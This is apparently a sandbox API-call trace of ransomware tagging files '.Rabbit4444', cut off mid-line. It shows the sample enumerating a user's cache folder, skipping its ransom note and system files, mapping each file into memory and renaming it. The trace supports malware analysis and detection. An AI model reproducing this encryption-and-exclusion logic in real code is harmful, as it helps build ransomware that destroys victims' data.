[0068.489] CloseHandle (hObject=0x29c) returned 1 [0068.489] CloseHandle (hObject=0x280) returned 1 [0068.489] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{F6932121-D2DA-4225-88E3-261818BB07E2}.Rabbit4444") returned 156 [0068.489] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{F6932121-D2DA-4225-88E3-261818BB07E2}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{f6932121-d2da-4225-88e3-261818bb07e2}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{F6932121-D2DA-4225-88E3-261818BB07E2}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{f6932121-d2da-4225-88e3-261818bb07e2}.rabbit4444"), dwFlags=0x1) returned 1 [0068.490] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c9068dc, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9c9068dc, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4558b17d, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{F7D10E06-7C0F-411C-8ED2-8C19184C6238}", cAlternateFileName="{F7D10~1")) returned 1 [0068.490] lstrcmpiW (lpString1="{F7D10E06-7C0F-411C-8ED2-8C19184C6238}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.490] lstrcmpiW (lpString1="{F7D10E06-7C0F-411C-8ED2-8C19184C6238}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.490] lstrcmpiW (lpString1="{F7D10E06-7C0F-411C-8ED2-8C19184C6238}", lpString2="Rabbit4444.exe") returned -1 [0068.490] lstrcmpiW (lpString1="{F7D10E06-7C0F-411C-8ED2-8C19184C6238}", lpString2=".") returned 1 [0068.490] lstrcmpiW (lpString1="{F7D10E06-7C0F-411C-8ED2-8C19184C6238}", lpString2="..") returned 1 [0068.490] lstrcmpiW (lpString1="{F7D10E06-7C0F-411C-8ED2-8C19184C6238}", lpString2="windows") returned -1 [0068.490] lstrcmpiW (lpString1="{F7D10E06-7C0F-411C-8ED2-8C19184C6238}", lpString2="bootmgr") returned -1 [0068.490] lstrcmpiW (lpString1="{F7D10E06-7C0F-411C-8ED2-8C19184C6238}", lpString2="pagefile.sys") returned -1 [0068.490] lstrcmpiW (lpString1="{F7D10E06-7C0F-411C-8ED2-8C19184C6238}", lpString2="boot") returned -1 [0068.490] lstrcmpiW (lpString1="{F7D10E06-7C0F-411C-8ED2-8C19184C6238}", lpString2="ids.txt") returned -1 [0068.490] lstrcmpiW (lpString1="{F7D10E06-7C0F-411C-8ED2-8C19184C6238}", lpString2="NTUSER.DAT") returned -1 [0068.490] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{F7D10E06-7C0F-411C-8ED2-8C19184C6238}" | out: lpString1="{F7D10E06-7C0F-411C-8ED2-8C19184C6238}") returned="{F7D10E06-7C0F-411C-8ED2-8C19184C6238}" [0068.490] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{F7D10E06-7C0F-411C-8ED2-8C19184C6238}", dwFileAttributes=0x0) returned 1 [0068.490] lstrlenW (lpString="{F7D10E06-7C0F-411C-8ED2-8C19184C6238}") returned 38 [0068.490] lstrlenW (lpString="Rabbit4444") returned 10 [0068.490] lstrcmpiW (lpString1="9184C6238}", lpString2="Rabbit4444") returned -1 [0068.490] lstrlenW (lpString=".dll") returned 4 [0068.490] lstrcmpiW (lpString1="238}", lpString2=".dll") returned 1 [0068.491] lstrlenW (lpString=".lnk") returned 4 [0068.491] lstrcmpiW (lpString1="238}", lpString2=".lnk") returned 1 [0068.491] lstrlenW (lpString=".ini") returned 4 [0068.491] lstrcmpiW (lpString1="238}", lpString2=".ini") returned 1 [0068.491] lstrlenW (lpString=".sys") returned 4 [0068.491] lstrcmpiW (lpString1="238}", lpString2=".sys") returned 1 [0068.491] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{F7D10E06-7C0F-411C-8ED2-8C19184C6238}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{f7d10e06-7c0f-411c-8ed2-8c19184c6238}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.491] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.491] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15980181242) returned 1 [0068.491] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.491] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0068.491] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0068.491] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.492] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.493] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.493] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0068.493] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.493] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0068.493] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.494] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0068.494] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.494] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0068.494] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15980440702) returned 1 [0068.494] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0068.494] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0068.494] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.494] CloseHandle (hObject=0x29c) returned 1 [0068.494] CloseHandle (hObject=0x280) returned 1 [0068.494] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{F7D10E06-7C0F-411C-8ED2-8C19184C6238}.Rabbit4444") returned 156 [0068.494] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{F7D10E06-7C0F-411C-8ED2-8C19184C6238}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{f7d10e06-7c0f-411c-8ed2-8c19184c6238}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{F7D10E06-7C0F-411C-8ED2-8C19184C6238}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{f7d10e06-7c0f-411c-8ed2-8c19184c6238}.rabbit4444"), dwFlags=0x1) returned 1 [0068.495] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a1afaf4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9a1afaf4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x453492ab, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{FC8C8E15-37CE-4712-91B1-473246FA9BC6}", cAlternateFileName="{FC8C8~1")) returned 1 [0068.495] lstrcmpiW (lpString1="{FC8C8E15-37CE-4712-91B1-473246FA9BC6}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.495] lstrcmpiW (lpString1="{FC8C8E15-37CE-4712-91B1-473246FA9BC6}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.495] lstrcmpiW (lpString1="{FC8C8E15-37CE-4712-91B1-473246FA9BC6}", lpString2="Rabbit4444.exe") returned -1 [0068.495] lstrcmpiW (lpString1="{FC8C8E15-37CE-4712-91B1-473246FA9BC6}", lpString2=".") returned 1 [0068.495] lstrcmpiW (lpString1="{FC8C8E15-37CE-4712-91B1-473246FA9BC6}", lpString2="..") returned 1 [0068.495] lstrcmpiW (lpString1="{FC8C8E15-37CE-4712-91B1-473246FA9BC6}", lpString2="windows") returned -1 [0068.495] lstrcmpiW (lpString1="{FC8C8E15-37CE-4712-91B1-473246FA9BC6}", lpString2="bootmgr") returned -1 [0068.495] lstrcmpiW (lpString1="{FC8C8E15-37CE-4712-91B1-473246FA9BC6}", lpString2="pagefile.sys") returned -1 [0068.495] lstrcmpiW (lpString1="{FC8C8E15-37CE-4712-91B1-473246FA9BC6}", lpString2="boot") returned -1 [0068.495] lstrcmpiW (lpString1="{FC8C8E15-37CE-4712-91B1-473246FA9BC6}", lpString2="ids.txt") returned -1 [0068.495] lstrcmpiW (lpString1="{FC8C8E15-37CE-4712-91B1-473246FA9BC6}", lpString2="NTUSER.DAT") returned -1 [0068.495] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{FC8C8E15-37CE-4712-91B1-473246FA9BC6}" | out: lpString1="{FC8C8E15-37CE-4712-91B1-473246FA9BC6}") returned="{FC8C8E15-37CE-4712-91B1-473246FA9BC6}" [0068.495] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{FC8C8E15-37CE-4712-91B1-473246FA9BC6}", dwFileAttributes=0x0) returned 1 [0068.496] lstrlenW (lpString="{FC8C8E15-37CE-4712-91B1-473246FA9BC6}") returned 38 [0068.496] lstrlenW (lpString="Rabbit4444") returned 10 [0068.496] lstrcmpiW (lpString1="246FA9BC6}", lpString2="Rabbit4444") returned -1 [0068.496] lstrlenW (lpString=".dll") returned 4 [0068.496] lstrcmpiW (lpString1="BC6}", lpString2=".dll") returned 1 [0068.496] lstrlenW (lpString=".lnk") returned 4 [0068.496] lstrcmpiW (lpString1="BC6}", lpString2=".lnk") returned 1 [0068.496] lstrlenW (lpString=".ini") returned 4 [0068.496] lstrcmpiW (lpString1="BC6}", lpString2=".ini") returned 1 [0068.496] lstrlenW (lpString=".sys") returned 4 [0068.496] lstrcmpiW (lpString1="BC6}", lpString2=".sys") returned 1 [0068.496] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{FC8C8E15-37CE-4712-91B1-473246FA9BC6}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{fc8c8e15-37ce-4712-91b1-473246fa9bc6}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.496] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.496] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15980709852) returned 1 [0068.496] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.496] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0068.496] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0068.497] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.498] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.499] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.499] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0068.499] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.499] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0068.499] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.499] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0068.499] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.499] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0068.499] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15980997723) returned 1 [0068.499] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0068.499] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0068.499] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.499] CloseHandle (hObject=0x29c) returned 1 [0068.500] CloseHandle (hObject=0x280) returned 1 [0068.500] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{FC8C8E15-37CE-4712-91B1-473246FA9BC6}.Rabbit4444") returned 156 [0068.500] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{FC8C8E15-37CE-4712-91B1-473246FA9BC6}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{fc8c8e15-37ce-4712-91b1-473246fa9bc6}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{FC8C8E15-37CE-4712-91B1-473246FA9BC6}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{fc8c8e15-37ce-4712-91b1-473246fa9bc6}.rabbit4444"), dwFlags=0x1) returned 1 [0068.500] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1adee73, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xa1adee73, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0x454541d3, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{FD71169F-D6C7-4087-AFF7-A180276CA9FF}", cAlternateFileName="{FD711~1")) returned 1 [0068.500] lstrcmpiW (lpString1="{FD71169F-D6C7-4087-AFF7-A180276CA9FF}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.500] lstrcmpiW (lpString1="{FD71169F-D6C7-4087-AFF7-A180276CA9FF}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.500] lstrcmpiW (lpString1="{FD71169F-D6C7-4087-AFF7-A180276CA9FF}", lpString2="Rabbit4444.exe") returned -1 [0068.500] lstrcmpiW (lpString1="{FD71169F-D6C7-4087-AFF7-A180276CA9FF}", lpString2=".") returned 1 [0068.500] lstrcmpiW (lpString1="{FD71169F-D6C7-4087-AFF7-A180276CA9FF}", lpString2="..") returned 1 [0068.500] lstrcmpiW (lpString1="{FD71169F-D6C7-4087-AFF7-A180276CA9FF}", lpString2="windows") returned -1 [0068.500] lstrcmpiW (lpString1="{FD71169F-D6C7-4087-AFF7-A180276CA9FF}", lpString2="bootmgr") returned -1 [0068.501] lstrcmpiW (lpString1="{FD71169F-D6C7-4087-AFF7-A180276CA9FF}", lpString2="pagefile.sys") returned -1 [0068.501] lstrcmpiW (lpString1="{FD71169F-D6C7-4087-AFF7-A180276CA9FF}", lpString2="boot") returned -1 [0068.501] lstrcmpiW (lpString1="{FD71169F-D6C7-4087-AFF7-A180276CA9FF}", lpString2="ids.txt") returned -1 [0068.501] lstrcmpiW (lpString1="{FD71169F-D6C7-4087-AFF7-A180276CA9FF}", lpString2="NTUSER.DAT") returned -1 [0068.501] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{FD71169F-D6C7-4087-AFF7-A180276CA9FF}" | out: lpString1="{FD71169F-D6C7-4087-AFF7-A180276CA9FF}") returned="{FD71169F-D6C7-4087-AFF7-A180276CA9FF}" [0068.501] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{FD71169F-D6C7-4087-AFF7-A180276CA9FF}", dwFileAttributes=0x0) returned 1 [0068.501] lstrlenW (lpString="{FD71169F-D6C7-4087-AFF7-A180276CA9FF}") returned 38 [0068.501] lstrlenW (lpString="Rabbit4444") returned 10 [0068.501] lstrcmpiW (lpString1="0276CA9FF}", lpString2="Rabbit4444") returned -1 [0068.501] lstrlenW (lpString=".dll") returned 4 [0068.501] lstrcmpiW (lpString1="9FF}", lpString2=".dll") returned 1 [0068.501] lstrlenW (lpString=".lnk") returned 4 [0068.501] lstrcmpiW (lpString1="9FF}", lpString2=".lnk") returned 1 [0068.501] lstrlenW (lpString=".ini") returned 4 [0068.501] lstrcmpiW (lpString1="9FF}", lpString2=".ini") returned 1 [0068.501] lstrlenW (lpString=".sys") returned 4 [0068.502] lstrcmpiW (lpString1="9FF}", lpString2=".sys") returned 1 [0068.502] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{FD71169F-D6C7-4087-AFF7-A180276CA9FF}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{fd71169f-d6c7-4087-aff7-a180276ca9ff}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.502] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.502] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15981294460) returned 1 [0068.502] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.502] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0068.502] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0068.502] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.504] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0068.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0068.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0068.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0068.505] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15981588439) returned 1 [0068.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0068.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0068.505] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.505] CloseHandle (hObject=0x29c) returned 1 [0068.505] CloseHandle (hObject=0x280) returned 1 [0068.506] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{FD71169F-D6C7-4087-AFF7-A180276CA9FF}.Rabbit4444") returned 156 [0068.506] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{FD71169F-D6C7-4087-AFF7-A180276CA9FF}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{fd71169f-d6c7-4087-aff7-a180276ca9ff}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{FD71169F-D6C7-4087-AFF7-A180276CA9FF}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{fd71169f-d6c7-4087-aff7-a180276ca9ff}.rabbit4444"), dwFlags=0x1) returned 1 [0068.506] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c8941cb, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9c8941cb, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x454541d3, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{FE9E45E3-96FD-468B-B1CE-3961D08AD216}", cAlternateFileName="{FE9E4~1")) returned 1 [0068.506] lstrcmpiW (lpString1="{FE9E45E3-96FD-468B-B1CE-3961D08AD216}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.506] lstrcmpiW (lpString1="{FE9E45E3-96FD-468B-B1CE-3961D08AD216}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.506] lstrcmpiW (lpString1="{FE9E45E3-96FD-468B-B1CE-3961D08AD216}", lpString2="Rabbit4444.exe") returned -1 [0068.506] lstrcmpiW (lpString1="{FE9E45E3-96FD-468B-B1CE-3961D08AD216}", lpString2=".") returned 1 [0068.506] lstrcmpiW (lpString1="{FE9E45E3-96FD-468B-B1CE-3961D08AD216}", lpString2="..") returned 1 [0068.506] lstrcmpiW (lpString1="{FE9E45E3-96FD-468B-B1CE-3961D08AD216}", lpString2="windows") returned -1 [0068.506] lstrcmpiW (lpString1="{FE9E45E3-96FD-468B-B1CE-3961D08AD216}", lpString2="bootmgr") returned -1 [0068.507] lstrcmpiW (lpString1="{FE9E45E3-96FD-468B-B1CE-3961D08AD216}", lpString2="pagefile.sys") returned -1 [0068.507] lstrcmpiW (lpString1="{FE9E45E3-96FD-468B-B1CE-3961D08AD216}", lpString2="boot") returned -1 [0068.507] lstrcmpiW (lpString1="{FE9E45E3-96FD-468B-B1CE-3961D08AD216}", lpString2="ids.txt") returned -1 [0068.507] lstrcmpiW (lpString1="{FE9E45E3-96FD-468B-B1CE-3961D08AD216}", lpString2="NTUSER.DAT") returned -1 [0068.507] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{FE9E45E3-96FD-468B-B1CE-3961D08AD216}" | out: lpString1="{FE9E45E3-96FD-468B-B1CE-3961D08AD216}") returned="{FE9E45E3-96FD-468B-B1CE-3961D08AD216}" [0068.507] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{FE9E45E3-96FD-468B-B1CE-3961D08AD216}", dwFileAttributes=0x0) returned 1 [0068.507] lstrlenW (lpString="{FE9E45E3-96FD-468B-B1CE-3961D08AD216}") returned 38 [0068.507] lstrlenW (lpString="Rabbit4444") returned 10 [0068.507] lstrcmpiW (lpString1="1D08AD216}", lpString2="Rabbit4444") returned -1 [0068.507] lstrlenW (lpString=".dll") returned 4 [0068.507] lstrcmpiW (lpString1="216}", lpString2=".dll") returned 1 [0068.507] lstrlenW (lpString=".lnk") returned 4 [0068.507] lstrcmpiW (lpString1="216}", lpString2=".lnk") returned 1 [0068.507] lstrlenW (lpString=".ini") returned 4 [0068.507] lstrcmpiW (lpString1="216}", lpString2=".ini") returned 1 [0068.507] lstrlenW (lpString=".sys") returned 4 [0068.507] lstrcmpiW (lpString1="216}", lpString2=".sys") returned 1 [0068.507] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{FE9E45E3-96FD-468B-B1CE-3961D08AD216}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{fe9e45e3-96fd-468b-b1ce-3961d08ad216}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.508] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.508] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15981834729) returned 1 [0068.508] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 